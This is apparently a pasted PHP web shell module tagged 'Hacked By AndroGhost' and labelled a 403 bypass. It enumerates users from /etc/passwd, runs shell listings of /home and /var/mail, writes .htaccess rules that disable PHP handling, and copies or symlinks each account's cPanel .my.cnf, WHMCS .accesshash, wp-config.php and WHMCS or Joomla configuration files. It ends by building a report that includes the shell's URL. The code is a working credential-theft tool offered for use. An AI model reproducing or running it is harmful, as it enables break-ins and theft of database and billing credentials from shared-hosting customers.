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Apr 19th, 2019
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  1. /* Hacked By AndroGhost */
  3. <?php ?><html>
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  106. echo '<div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;></div><br>
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  108. <center>
  109. <div style="text-align: center;"><big><span style="height: 0px;"><big style="font-family: AR CENA;"><span style="height: 0px;"><small><span style="height: 0px;"><span style="widows: 2; text-transform: none; text-indent: 0px; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0, 0, 0); word-spacing: 0px; font-style: normal; font-variant: normal; font-weight: 700;" class="Apple-style-span"><span style="widows: 2; text-transform: none; text-indent: 0px; font-style: normal; font-variant: normal; font-weight: normal; font-size: medium; line-height: normal; font-size-adjust: none; font-stretch: normal; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0, 0, 0); word-spacing: 0px;" class="Apple-style-span"><span style="widows: 2; text-transform: none; text-indent: 0px; font-style: normal; font-variant: normal; font-weight: normal; font-size: medium; line-height: normal; font-size-adjust: none; font-stretch: normal; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0, 0, 0); word-spacing: 0px;" class="Apple-style-span"><font color="white" size="6"><big><span style="font-weight: bold; text-shadow: white 0px 0px 12px; color: white;"><span lang="en-us"><span style="color: white;"># Bypass</span> <span style="color: rgb(112, 0, 0);">403 !!<br><small><small><small><small><span style="color: white;">./</span></small></small></small></small><br></span></span></span></big></font></span></span></span><span style="widows: 2; text-transform: none; background-color: rgb(0, 0, 0); text-indent: 0px; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0, 0, 0); word-spacing: 0px; font-style: normal; font-variant: normal; font-weight: 700;" class="Apple-style-span"><span style="widows: 2; text-transform: none; background-color: rgb(0, 0, 0); text-indent: 0px; font-style: normal; font-variant: normal; font-weight: normal; font-size: medium; line-height: normal; font-size-adjust: none; font-stretch: normal; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0, 0, 0); word-spacing: 0px;" class="Apple-style-span"><span style="widows: 2; text-transform: none; text-indent: 0px; font-style: normal; font-variant: normal; font-weight: normal; font-size: medium; line-height: normal; font-size-adjust: none; font-stretch: normal; white-space: normal; orphans: 2; letter-spacing: normal; color: rgb(0, 0, 0); word-spacing: 0px; background-color: rgb(0, 0, 0);" class="Apple-style-span"><font color="white" size="2"><big><span style="font-weight: bold; text-shadow: white 0px 0px 12px; color: white;"><span lang="en-us">
  110. <center><textarea style="color: white;background-color:#0000" cols="66" name="passwd" rows="18">';
  111. $uSr = file("/etc/passwd");
  112. foreach ($uSr as $usrr) {
  113. $str = explode(":", $usrr);
  114. echo $str[0] . "
  115. ";
  116. }
  117. echo system('ls /var/mail');
  118. echo system('ls /home');
  119. echo '</textarea><br>
  120. Home :
  121. <select name="home">
  122. <option title="home" value="home">home</option>
  123. <option title="home1" value="home1">home1</option>
  124. <option title="home2" value="home2">home2</option>
  125. <option title="home3" value="home3">home3</option>
  126. <option title="home4" value="home4">home4</option>
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  130. <option title="home8" value="home8">home8</option>
  131. <option title="home9" value="home9">home9</option>
  132. <option title="home10" value="home10">home10</option>
  133. </select><br>
  134. .htaccess :
  135. <select name="achon666ju5t">
  136. <option title="biasa" value="Options Indexes FollowSymLinks
  137. DirectoryIndex achon666ju5t.extremecrew
  138. AddType txt .php
  139. AddHandler txt .php">Apache 1</option>
  140. <option title="Apache" value="Options all
  141. Options +Indexes
  142. Options +FollowSymLinks
  143. DirectoryIndex achon666ju5t.extremecrew
  144. AddType text/plain .php
  145. AddHandler server-parsed .php
  146. AddType text/plain .html
  147. AddHandler txt .html
  148. Require None
  149. Satisfy Any">Apache 2</option>
  150. <option title="Litespeed" value="
  151. Options +FollowSymLinks
  152. DirectoryIndex achon666ju5t.extremecrew
  153. RemoveHandler .php
  154. AddType application/octet-stream .php ">Litespeed</option>
  155. </select>
  156. <input style="color:red;background-color:#FFFF" name="conf" size="10"
  157. value="./Star 403" type="submit">
  158. <br/><br/></form>';
  159. if ($_POST['conf']) {
  160. $home = $_POST['home'];
  161. $folfig = $home;
  162. @mkdir($folfig, 0755);
  163. @chdir($folfig);
  164. $htaccess = $_POST['achon666ju5t'];
  165. file_put_contents(".htaccess", $htaccess, FILE_APPEND);
  166. $passwd = explode("
  167. ", $_POST["passwd"]);
  168. foreach ($passwd as $pwd) {
  169. $user = trim($pwd);
  170. symlink('/', '000~ROOT~000');
  171. copy('/' . $home . '/' . $user . '/.my.cnf', $user . ' CPANEL');
  172. symlink('/' . $home . '/' . $user . '/.my.cnf', $user . ' CPANEL');
  173. copy('/' . $home . '/' . $user . '/.accesshash', $user . 'WHMCS.txt');
  174. symlink('/' . $home . '/' . $user . '/.accesshash', $user . 'WHMCS.txt');
  175. copy('/' . $home . '/' . $user . '/public_html/', $user . ' RESELLER.txt');
  176. symlink('/' . $home . '/' . $user . '/public_html/', $user . ' RESELLER.txt');
  177. symlink('/' . $home . '/' . $user . '/public_html/.accesshash', $user . 'WHMCS.txt');
  178. copy('/' . $home . '/' . $user . '/public_html/wp-config.php', $user . 'WORDPRESS.txt');
  179. copy('/' . $home . '/' . $user . '/public_html/configuration.php', $user . ' WHMCS or JOOMLA.txt');
  180. copy('/' . $home . '/' . $user . '/public_html/account/configuration.php', $user . 'WHMCS.txt');
  181. copy('/' . $home . '/' . $user . '/public_html/accounts/configuration.php', $user . 'WHMCS.txt');
  182. copy('/' . $home . '/' . $user . '/public_html/buy/configuration.php', $user . 'WHMCS.txt');
  183. copy('/' . $home . '/' . $user . '/public_html/checkout/configuration.php', $user . 'WHMCS.txt');
  184. copy('/' . $home . '/' . $user . '/public_html/central/configuration.php', $user . 'WHMCS.txt');
  185. copy('/' . $home . '/' . $user . '/public_html/clienti/configuration.php', $user . 'WHMCS.txt');
  186. copy('/' . $home . '/' . $user . '/public_html/client/configuration.php', $user . 'WHMCS.txt');
  187. copy('/' . $home . '/' . $user . '/public_html/cliente/configuration.php', $user . 'WHMCS.txt');
  188. copy('/' . $home . '/' . $user . '/public_html/clientes/configuration.php', $user . 'WHMCS.txt');
  189. copy('/' . $home . '/' . $user . '/public_html/clients/configuration.php', $user . 'WHMCS.txt');
  190. copy('/' . $home . '/' . $user . '/public_html/clientarea/configuration.php', $user . 'WHMCS.txt');
  191. copy('/' . $home . '/' . $user . '/public_html/clientsarea/configuration.php', $user . 'WHMCS.txt');
  192. copy('/' . $home . '/' . $user . '/public_html/client-area/configuration.php', $user . 'WHMCS.txt');
  193. copy('/' . $home . '/' . $user . '/public_html/clients-area/configuration.php', $user . 'WHMCS.txt');
  194. copy('/' . $home . '/' . $user . '/public_html/clientzone/configuration.php', $user . 'WHMCS.txt');
  195. copy('/' . $home . '/' . $user . '/public_html/client-zone/configuration.php', $user . 'WHMCS.txt');
  196. copy('/' . $home . '/' . $user . '/public_html/core/configuration.php', $user . 'WHMCS.txt');
  197. copy('/' . $home . '/' . $user . '/public_html/company/configuration.php', $user . 'WHMCS.txt');
  198. copy('/' . $home . '/' . $user . '/public_html/customer/configuration.php', $user . 'WHMCS.txt');
  199. copy('/' . $home . '/' . $user . '/public_html/customers/configuration.php', $user . 'WHMCS.txt');
  200. copy('/' . $home . '/' . $user . '/public_html/bill/configuration.php', $user . 'WHMCS.txt');
  201. copy('/' . $home . '/' . $user . '/public_html/billing/configuration.php', $user . 'WHMCS.txt');
  202. copy('/' . $home . '/' . $user . '/public_html/finance/configuration.php', $user . 'WHMCS.txt');
  203. copy('/' . $home . '/' . $user . '/public_html/financeiro/configuration.php', $user . 'WHMCS.txt');
  204. copy('/' . $home . '/' . $user . '/public_html/host/configuration.php', $user . 'WHMCS.txt');
  205. copy('/' . $home . '/' . $user . '/public_html/hosts/configuration.php', $user . 'WHMCS.txt');
  206. copy('/' . $home . '/' . $user . '/public_html/hosting/configuration.php', $user . 'WHMCS.txt');
  207. copy('/' . $home . '/' . $user . '/public_html/hostings/configuration.php', $user . 'WHMCS.txt');
  208. copy('/' . $home . '/' . $user . '/public_html/klien/configuration.php', $user . 'WHMCS.txt');
  209. copy('/' . $home . '/' . $user . '/public_html/manage/configuration.php', $user . 'WHMCS.txt');
  210. copy('/' . $home . '/' . $user . '/public_html/manager/configuration.php', $user . 'WHMCS.txt');
  211. copy('/' . $home . '/' . $user . '/public_html/member/configuration.php', $user . 'WHMCS.txt');
  212. copy('/' . $home . '/' . $user . '/public_html/members/configuration.php', $user . 'WHMCS.txt');
  213. copy('/' . $home . '/' . $user . '/public_html/my/configuration.php', $user . 'WHMCS.txt');
  214. copy('/' . $home . '/' . $user . '/public_html/myaccount/configuration.php', $user . 'WHMCS.txt');
  215. copy('/' . $home . '/' . $user . '/public_html/my-account/client/configuration.php', $user . 'WHMCS.txt');
  216. copy('/' . $home . '/' . $user . '/public_html/myaccounts/configuration.php', $user . 'WHMCS.txt');
  217. copy('/' . $home . '/' . $user . '/public_html/my-accounts/configuration.php', $user . 'WHMCS.txt');
  218. copy('/' . $home . '/' . $user . '/public_html/order/configuration.php', $user . 'WHMCS.txt');
  219. copy('/' . $home . '/' . $user . '/public_html/orders/configuration.php', $user . 'WHMCS.txt');
  220. copy('/' . $home . '/' . $user . '/public_html/painel/configuration.php', $user . 'WHMCS.txt');
  221. copy('/' . $home . '/' . $user . '/public_html/panel/configuration.php', $user . 'WHMCS.txt');
  222. copy('/' . $home . '/' . $user . '/public_html/panels/configuration.php', $user . 'WHMCS.txt');
  223. copy('/' . $home . '/' . $user . '/public_html/portal/configuration.php', $user . 'WHMCS.txt');
  224. copy('/' . $home . '/' . $user . '/public_html/portals/configuration.php', $user . 'WHMCS.txt');
  225. copy('/' . $home . '/' . $user . '/public_html/purchase/configuration.php', $user . 'WHMCS.txt');
  226. copy('/' . $home . '/' . $user . '/public_html/secure/configuration.php', $user . 'WHMCS.txt');
  227. copy('/' . $home . '/' . $user . '/public_html/support/configuration.php', $user . 'WHMCS.txt');
  228. copy('/' . $home . '/' . $user . '/public_html/supporte/configuration.php', $user . 'WHMCS.txt');
  229. copy('/' . $home . '/' . $user . '/public_html/supports/configuration.php', $user . 'WHMCS.txt');
  230. copy('/' . $home . '/' . $user . '/public_html/web/configuration.php', $user . 'WHMCS.txt');
  231. copy('/' . $home . '/' . $user . '/public_html/webhost/configuration.php', $user . 'WHMCS.txt');
  232. copy('/' . $home . '/' . $user . '/public_html/webhosting/configuration.php', $user . 'WHMCS.txt');
  233. copy('/' . $home . '/' . $user . '/public_html/whm/configuration.php', $user . 'WHMCS.txt');
  234. copy('/' . $home . '/' . $user . '/public_html/whmcs/configuration.php', $user . 'WHMCS.txt');
  235. copy('/' . $home . '/' . $user . '/public_html/whmcs2/configuration.php', $user . 'WHMCS.txt');
  236. copy('/' . $home . '/' . $user . '/public_html/Whm/configuration.php', $user . 'WHMCS.txt');
  237. copy('/' . $home . '/' . $user . '/public_html/Whmcs/configuration.php', $user . 'WHMCS.txt');
  238. copy('/' . $home . '/' . $user . '/public_html/WHM/configuration.php', $user . 'WHMCS.txt');
  239. copy('/' . $home . '/' . $user . '/public_html/WHMCS/configuration.php', $user . 'WHMCS.txt');
  240. symlink('/' . $home . '/' . $user . '/public_html/wp-config.php', $user . 'WORDPRESS.txt');
  241. symlink('/' . $home . '/' . $user . '/public_html/configuration.php', $user . ' WHMCS or JOOMLA.txt');
  242. symlink('/' . $home . '/' . $user . '/public_html/account/configuration.php', $user . 'WHMCS.txt');
  243. symlink('/' . $home . '/' . $user . '/public_html/accounts/configuration.php', $user . 'WHMCS.txt');
  244. symlink('/' . $home . '/' . $user . '/public_html/buy/configuration.php', $user . 'WHMCS.txt');
  245. symlink('/' . $home . '/' . $user . '/public_html/checkout/configuration.php', $user . 'WHMCS.txt');
  246. symlink('/' . $home . '/' . $user . '/public_html/central/configuration.php', $user . 'WHMCS.txt');
  247. symlink('/' . $home . '/' . $user . '/public_html/clienti/configuration.php', $user . 'WHMCS.txt');
  248. symlink('/' . $home . '/' . $user . '/public_html/client/configuration.php', $user . 'WHMCS.txt');
  249. symlink('/' . $home . '/' . $user . '/public_html/cliente/configuration.php', $user . 'WHMCS.txt');
  250. symlink('/' . $home . '/' . $user . '/public_html/clientes/configuration.php', $user . 'WHMCS.txt');
  251. symlink('/' . $home . '/' . $user . '/public_html/clients/configuration.php', $user . 'WHMCS.txt');
  252. symlink('/' . $home . '/' . $user . '/public_html/clientarea/configuration.php', $user . 'WHMCS.txt');
  253. symlink('/' . $home . '/' . $user . '/public_html/clientsarea/configuration.php', $user . 'WHMCS.txt');
  254. symlink('/' . $home . '/' . $user . '/public_html/client-area/configuration.php', $user . 'WHMCS.txt');
  255. symlink('/' . $home . '/' . $user . '/public_html/clients-area/configuration.php', $user . 'WHMCS.txt');
  256. symlink('/' . $home . '/' . $user . '/public_html/clientzone/configuration.php', $user . 'WHMCS.txt');
  257. symlink('/' . $home . '/' . $user . '/public_html/client-zone/configuration.php', $user . 'WHMCS.txt');
  258. symlink('/' . $home . '/' . $user . '/public_html/core/configuration.php', $user . 'WHMCS.txt');
  259. symlink('/' . $home . '/' . $user . '/public_html/company/configuration.php', $user . 'WHMCS.txt');
  260. symlink('/' . $home . '/' . $user . '/public_html/customer/configuration.php', $user . 'WHMCS.txt');
  261. symlink('/' . $home . '/' . $user . '/public_html/customers/configuration.php', $user . 'WHMCS.txt');
  262. symlink('/' . $home . '/' . $user . '/public_html/bill/configuration.php', $user . 'WHMCS.txt');
  263. symlink('/' . $home . '/' . $user . '/public_html/billing/configuration.php', $user . 'WHMCS.txt');
  264. symlink('/' . $home . '/' . $user . '/public_html/finance/configuration.php', $user . 'WHMCS.txt');
  265. symlink('/' . $home . '/' . $user . '/public_html/financeiro/configuration.php', $user . 'WHMCS.txt');
  266. symlink('/' . $home . '/' . $user . '/public_html/host/configuration.php', $user . 'WHMCS.txt');
  267. symlink('/' . $home . '/' . $user . '/public_html/hosts/configuration.php', $user . 'WHMCS.txt');
  268. symlink('/' . $home . '/' . $user . '/public_html/hosting/configuration.php', $user . 'WHMCS.txt');
  269. symlink('/' . $home . '/' . $user . '/public_html/hostings/configuration.php', $user . 'WHMCS.txt');
  270. symlink('/' . $home . '/' . $user . '/public_html/klien/configuration.php', $user . 'WHMCS.txt');
  271. symlink('/' . $home . '/' . $user . '/public_html/manage/configuration.php', $user . 'WHMCS.txt');
  272. symlink('/' . $home . '/' . $user . '/public_html/manager/configuration.php', $user . 'WHMCS.txt');
  273. symlink('/' . $home . '/' . $user . '/public_html/member/configuration.php', $user . 'WHMCS.txt');
  274. symlink('/' . $home . '/' . $user . '/public_html/members/configuration.php', $user . 'WHMCS.txt');
  275. symlink('/' . $home . '/' . $user . '/public_html/my/configuration.php', $user . 'WHMCS.txt');
  276. symlink('/' . $home . '/' . $user . '/public_html/myaccount/configuration.php', $user . 'WHMCS.txt');
  277. symlink('/' . $home . '/' . $user . '/public_html/my-account/client/configuration.php', $user . 'WHMCS.txt');
  278. symlink('/' . $home . '/' . $user . '/public_html/myaccounts/configuration.php', $user . 'WHMCS.txt');
  279. symlink('/' . $home . '/' . $user . '/public_html/my-accounts/configuration.php', $user . 'WHMCS.txt');
  280. symlink('/' . $home . '/' . $user . '/public_html/order/configuration.php', $user . 'WHMCS.txt');
  281. symlink('/' . $home . '/' . $user . '/public_html/orders/configuration.php', $user . 'WHMCS.txt');
  282. symlink('/' . $home . '/' . $user . '/public_html/painel/configuration.php', $user . 'WHMCS.txt');
  283. symlink('/' . $home . '/' . $user . '/public_html/panel/configuration.php', $user . 'WHMCS.txt');
  284. symlink('/' . $home . '/' . $user . '/public_html/panels/configuration.php', $user . 'WHMCS.txt');
  285. symlink('/' . $home . '/' . $user . '/public_html/portal/configuration.php', $user . 'WHMCS.txt');
  286. symlink('/' . $home . '/' . $user . '/public_html/portals/configuration.php', $user . 'WHMCS.txt');
  287. symlink('/' . $home . '/' . $user . '/public_html/purchase/configuration.php', $user . 'WHMCS.txt');
  288. symlink('/' . $home . '/' . $user . '/public_html/secure/configuration.php', $user . 'WHMCS.txt');
  289. symlink('/' . $home . '/' . $user . '/public_html/support/configuration.php', $user . 'WHMCS.txt');
  290. symlink('/' . $home . '/' . $user . '/public_html/supporte/configuration.php', $user . 'WHMCS.txt');
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  439. echo '<b>Upload GAGAL !!!</b><br><br>';
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  446. ";
  447. $EL_MuHaMMeD.= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "
  448. ";
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  450. ";
  451. $EL_MuHaMMeD.= "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "
  452. ";
  453. $EL_MuHaMMeD.= "Avlanan Site : " . $_SERVER['HTTP_HOST'] . "
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